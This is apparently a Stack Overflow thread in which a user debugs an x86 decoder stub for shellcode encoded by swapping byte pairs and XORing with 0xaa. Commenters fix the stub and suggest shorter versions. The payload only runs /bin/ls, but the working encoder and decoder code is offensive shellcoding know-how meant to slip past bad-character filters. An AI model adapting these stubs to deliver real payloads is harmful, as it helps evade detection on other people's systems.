Intel x86 (IA32) assembly decoder stub for custom encoder not working as expected

Question

I have written a custom encoder which encodes my shellcode in this way:

First, it swaps each pair of adjacent bytes in the original shellcode; then it XORs every byte with 0xaa. I checked that the original shellcode does not contain 0xaa, because such a byte would encode to 0x00 and introduce a bad character that could break the shellcode. Output of my encoder:

Original shellcode (25 bytes):
0x31,0xc0,0x50,0x68,0x2f,0x2f,0x6c,0x73,0x68,0x2f,0x62,0x69,0x6e,0x89,0xe3,0x50,0x89,0xe2,0x53,0x89,0xe1,0xb0,0xb,0xcd,0x80,

Step 1 (swap adjacent bytes), encoded shellcode (25 bytes):
0xc0,0x31,0x68,0x50,0x2f,0x2f,0x73,0x6c,0x2f,0x68,0x69,0x62,0x89,0x6e,0x50,0xe3,0xe2,0x89,0x89,0x53,0xb0,0xe1,0xcd,0xb,0x80,

Step 2 (XOR each byte with 0xaa), encoded shellcode (25 bytes):
0x6a,0x9b,0xc2,0xfa,0x85,0x85,0xd9,0xc6,0x85,0xc2,0xc3,0xc8,0x23,0xc4,0xfa,0x49,0x48,0x23,0x23,0xf9,0x1a,0x4b,0x67,0xa1,0x2a,
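
For reference, the two encoding steps can be modeled in a few lines of Python. This is only a sketch of the scheme as described above, not my actual encoder; the names `swap_adjacent`, `encode`, and `KEY` are made up for illustration.

```python
KEY = 0xAA  # XOR key used in the question


def swap_adjacent(data: bytes) -> bytes:
    """Swap each pair of adjacent bytes; an unpaired trailing byte stays put."""
    out = bytearray(data)
    for i in range(0, len(out) - 1, 2):
        out[i], out[i + 1] = out[i + 1], out[i]
    return bytes(out)


def encode(shellcode: bytes, key: int = KEY) -> bytes:
    """Step 1: swap adjacent bytes. Step 2: XOR every byte with the key."""
    if key in shellcode:
        # A byte equal to the key would encode to 0x00 (a bad character).
        raise ValueError("shellcode contains the key byte")
    return bytes(b ^ key for b in swap_adjacent(shellcode))


ORIGINAL = bytes([
    0x31, 0xc0, 0x50, 0x68, 0x2f, 0x2f, 0x6c, 0x73, 0x68, 0x2f, 0x62, 0x69,
    0x6e, 0x89, 0xe3, 0x50, 0x89, 0xe2, 0x53, 0x89, 0xe1, 0xb0, 0x0b, 0xcd,
    0x80,
])
ENCODED = encode(ORIGINAL)
print(",".join(hex(b) for b in ENCODED))
```

The printed bytes should match the Step 2 list above, which makes this a quick way to re-check the encoder output after changing the payload.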

The original shellcode simply executes /bin/ls on Linux using the execve syscall. Full code:

global _start

section .text
_start:

        ; PUSH the first null dword
        xor eax, eax
        push eax


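        ; PUSH /bin//ls (8 bytes)

        push 0x736c2f2f         ; "//ls"
        push 0x6e69622f         ; "/bin"


        mov ebx, esp            ; ebx = pointer to "/bin//ls"

        push eax                ; NULL dword
        mov edx, esp            ; edx = envp (points at the NULL dword)

        push ebx
        mov ecx, esp            ; ecx = argv = { "/bin//ls", NULL }


        mov al, 11              ; execve syscall number
        int 0x80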

To execute the shellcode, I'm practicing writing a decoder stub that decodes my custom-encoded shellcode and then executes it on the target machine.

This is my decoder stub assembly code:

global _start

section .text

_start:
        xor eax, eax
        xor ebx, ebx
        xor ecx, ecx
        xor edx, edx
        mov cl, 12

        jmp short call_decoder

; first : decode by XOR again with same value 0xaa
decode1:
        pop esi
        xor byte [esi], 0xaa
        jz decode2
        inc esi
        jmp short decode1

; second: rearrange the reversed adjacent BYTES, as part of encoding
decode2:
        pop esi
        mov bl, byte [esi + eax]
        mov dl, byte [esi + eax + 1]
        xchg bl, dl
        mov byte [esi + eax], bl
        mov byte [esi + eax + 1], dl
        add al, 2
        loop decode2
        ; execute Shellcode
        jmp short Shellcode

call_decoder:
        call decode1
        ; an extra byte 0xaa added at the end of encoded shellcode, as a marker to end of shellcode bytes.
        Shellcode: db 0x6a,0x9b,0xc2,0xfa,0x85,0x85,0xd9,0xc6,0x85,0xc2,0xc3,0xc8,0x23,0xc4,0xfa,0x49,0x48,0x23,0x23,0xf9,0x1a,0x4b,0x67,0xa1,0x2a,0xaa

But the above code gives me a segmentation fault, and I can't find the point of failure in gdb. What am I doing wrong?

You must only pop esi once, not every time through both loops. Be sure not to clobber it in the first loop so you still have the value to use in the second loop. — prl, Dec 24 '21 at 11:18
In the second loop, you use ecx as a loop counter but you never initialized it to the length of the code. You can count the bytes in the first loop and set ecx to count/2. (Or use cmp eax, count.) — prl, Dec 24 '21 at 11:21
@prl thanks a lot. Not a lot of folks are interested in low level, nowadays. You are god send :). Such small mistakes, can be so problematic to debug in assembly language. It works perfect now. I'm pasting the updated code as an answer, referring your comments. — dig_123, Dec 24 '21 at 16:28

dig_123 · Accepted Answer · 2021-12-28T06:38:45.180

Based on the comments by @prl, I made the following changes to my decoder stub, and it now works as expected:

global _start

section .text

; initialize registers
_start:
        xor eax, eax
        xor ebx, ebx
        xor ecx, ecx
        xor edx, edx
        mov cl, 12
        jmp short call_decoder

; set starting address of Shellcode in esi register
decoder:
        pop esi
        mov edi, esi

; first: decode by XOR again with same value 0xaa 
decode1:
        xor byte [edi], 0xaa
        jz decode2
        inc edi
        jmp short decode1

; second: rearrange the reversed adjacent BYTES, as part of encoding
decode2:
        mov bl, byte [esi + eax]
        mov dl, byte [esi + eax + 1]
        xchg bl, dl
        mov byte [esi + eax], bl
        mov byte [esi + eax + 1], dl
        add al, 2
        loop decode2

        jmp short Shellcode

call_decoder:
        call decoder
        Shellcode: db 0x6a,0x9b,0xc2,0xfa,0x85,0x85,0xd9,0xc6,0x85,0xc2,0xc3,0xc8,0x23,0xc4,0xfa,0x49,0x48,0x23,0x23,0xf9,0x1a,0x4b,0x67,0xa1,0x2a,0xaa
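
To sanity-check the logic outside a debugger, the two loops can be mirrored in Python. This is a rough model of the stub, not a replacement for it; `decode_two_pass` and `pairs` are hypothetical names, and the buffer is the `Shellcode: db ...` line including the trailing 0xaa marker.

```python
KEY = 0xAA  # same XOR key as the stub


def decode_two_pass(buf: bytearray, pairs: int) -> None:
    """Model of decode1 followed by decode2, operating in place."""
    # decode1: XOR byte by byte until a result is zero (the 0xaa end marker),
    # mirroring `xor byte [edi], 0xaa` / `jz decode2`.
    i = 0
    while True:
        buf[i] ^= KEY
        if buf[i] == 0:
            break
        i += 1
    # decode2: swap `pairs` adjacent byte pairs, mirroring the `loop decode2`
    # body with ecx as the pair counter and eax advancing by 2.
    for n in range(pairs):
        j = 2 * n
        buf[j], buf[j + 1] = buf[j + 1], buf[j]


buf = bytearray([
    0x6a, 0x9b, 0xc2, 0xfa, 0x85, 0x85, 0xd9, 0xc6, 0x85, 0xc2, 0xc3, 0xc8,
    0x23, 0xc4, 0xfa, 0x49, 0x48, 0x23, 0x23, 0xf9, 0x1a, 0x4b, 0x67, 0xa1,
    0x2a, 0xaa,
])
decode_two_pass(buf, pairs=12)  # 12 mirrors `mov cl, 12` (25 // 2)
print(",".join(hex(b) for b in buf))
```

The first 25 bytes printed should equal the original shellcode, followed by the zeroed marker. The 25th byte is decoded by the XOR pass but is never swapped, which is why 12 pairs are enough for a 25-byte payload.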

EDIT2: A more concise and cleaner version, which also avoids hardcoding the shellcode length:

global _start

section .text

_start:
        xor eax, eax
        xor ebx, ebx
        xor ecx, ecx
        jmp short call_decoder

decoder:
        pop esi
        mov cl, codeLen
        dec cl

decode:
        cmp al, cl
        jz last_byte_odd
        xor byte [esi + eax], 0xaa
        mov bl, byte [esi + eax]
        xor byte [esi + eax + 1], 0xaa
        xchg byte [esi + eax + 1], bl
        mov byte [esi + eax], bl
        add al, 1
        cmp al, cl
        jz Shellcode
        add al, 1
        jmp short decode


last_byte_odd:
        xor byte [esi + eax], 0xaa
        jmp short Shellcode

call_decoder:
        call decoder
        Shellcode: db 0x6a,0x9b,0xc2,0xfa,0x85,0x85,0xd9,0xc6,0x85,0xc2,0xc3,0xc8,0x23,0xc4,0xfa,0x49,0x48,0x23,0x23,0xf9,0x1a,0x4b,0x67,0xa1,0x2a
        codeLen         equ $-Shellcode

I leave it to low-level and shellcoding enthusiasts to decipher the logic.
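
For anyone who wants a hint, here is a rough Python model of the single-pass loop. It is a sketch that assumes a non-empty buffer; `decode_single_pass` is a made-up name, with `i` standing in for `al` and `last` for `cl`.

```python
KEY = 0xAA  # same XOR key as the stub


def decode_single_pass(buf: bytearray) -> None:
    """Model of the EDIT2 `decode` loop: XOR and swap one pair per iteration."""
    last = len(buf) - 1            # cl = codeLen - 1
    i = 0                          # al
    while True:
        if i == last:              # last_byte_odd: one unpaired byte remains
            buf[i] ^= KEY
            return
        lo = buf[i] ^ KEY          # xor byte [esi + eax], 0xaa
        hi = buf[i + 1] ^ KEY      # xor byte [esi + eax + 1], 0xaa
        buf[i], buf[i + 1] = hi, lo  # xchg / mov: store the pair swapped
        i += 1
        if i == last:              # even length: the pair just handled was the last
            return
        i += 1


buf = bytearray([
    0x6a, 0x9b, 0xc2, 0xfa, 0x85, 0x85, 0xd9, 0xc6, 0x85, 0xc2, 0xc3, 0xc8,
    0x23, 0xc4, 0xfa, 0x49, 0x48, 0x23, 0x23, 0xf9, 0x1a, 0x4b, 0x67, 0xa1,
    0x2a,
])
decode_single_pass(buf)
print(",".join(hex(b) for b in buf))
```

The two `i == last` checks are what let the same loop handle both odd and even lengths. Because the stub keeps the counter in `al` and `cl`, the real code is limited to payloads shorter than 256 bytes.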

Why two separate loops? Looks like it would be way easier to `lodsw` / `xor ax, 0xaaaa` / `xchg ah,al` / `stosw`. if you're optimizing for code-size not speed. Or maybe `lodsd` / `xor eax, 0xaaaaaaaa` / `bswap eax` / `ror eax,16` (unswap words; byte pairs stay swapped) / `stosw`; that avoids a few `66` operand-size prefixes and is faster, but is larger overall. Or to save on pointer setup, of course you can just `lodsw` / ... / `mov [esi-2], ax`. Or `mov eax, [edi]` / ... on ax / `stosw`. (The load doesn't need an operand-size prefix; wider load is safe if the buffer isn't at end of page.) — Peter Cordes, Dec 24 '21 at 17:34
@Peter Cordes: After `ror eax, 16` you meant `stosd` not `stosw` — ecm, Dec 24 '21 at 18:20
@PeterCordes Can you explain a bit more. Full code, I tried( | is newline): `global _start|section .text|_start:|xor eax, eax|xor ecx, ecx|mov cl, 12|jmp short call_decoder|decoder:|pop esi|mov edi, esi|decode:|lodsw|xor ax, 0xaaaa|xchg ah, al|stosw|loop decode|jmp short Shellcode|call_decoder:|call decoder|Shellcode: db 0x6a,0x9b,0xc2,0xfa,0x85,0x85,0xd9,0xc6,0x85,0xc2,0xc3,0xc8,0x23,0xc4,0xfa,0x49,0x48,0x23,0x23,0xf9,0x1a,0x4b,0x67,0xa1,0x2a`. Gives `segmentation fault`. As I debug with gdb, lodsw works as expected, but stosw doesn't write content of ax back to edi. Am I missing something ? — dig_123, Dec 25 '21 at 09:18
Should work if all of that is in a writeable+executable segment, since you're effectively creating self-modifying code. If not, if you build normally, obviously a store into the `.text` section will fault when it's mapped read-only + exec. [Segfault when writing to string allocated by db \[assembly\]](https://stackoverflow.com/q/25124591) should be applicable — Peter Cordes, Dec 25 '21 at 11:55
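
The `lodsw` / `xor ax, 0xaaaa` / `xchg ah,al` / `stosw` sequence suggested in the comments can be modeled in Python by treating each byte pair as a 16-bit little-endian word. This is only an illustrative sketch; `decode_words` is a hypothetical name. Note that with 25 bytes a 12-iteration word loop covers only the first 24, so the sketch XORs the unpaired last byte separately; that extra step is an assumption added here and is not part of the comment.

```python
import struct


def decode_words(buf: bytearray) -> None:
    """Decode in place, one 16-bit word (two bytes) per step."""
    for off in range(0, len(buf) - 1, 2):
        (ax,) = struct.unpack_from("<H", buf, off)  # lodsw
        ax ^= 0xAAAA                                # xor ax, 0xaaaa
        ax = ((ax & 0xFF) << 8) | (ax >> 8)         # xchg ah, al
        struct.pack_into("<H", buf, off, ax)        # stosw
    if len(buf) % 2:
        # Unpaired trailing byte: not reached by the word loop (assumed fix-up).
        buf[-1] ^= 0xAA


buf = bytearray([
    0x6a, 0x9b, 0xc2, 0xfa, 0x85, 0x85, 0xd9, 0xc6, 0x85, 0xc2, 0xc3, 0xc8,
    0x23, 0xc4, 0xfa, 0x49, 0x48, 0x23, 0x23, 0xf9, 0x1a, 0x4b, 0x67, 0xa1,
    0x2a,
])
decode_words(buf)
print(",".join(hex(b) for b in buf))
```

Without the trailing-byte step, the final byte would stay 0x2a instead of 0x80, so the last instruction would not decode to `int 0x80`.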
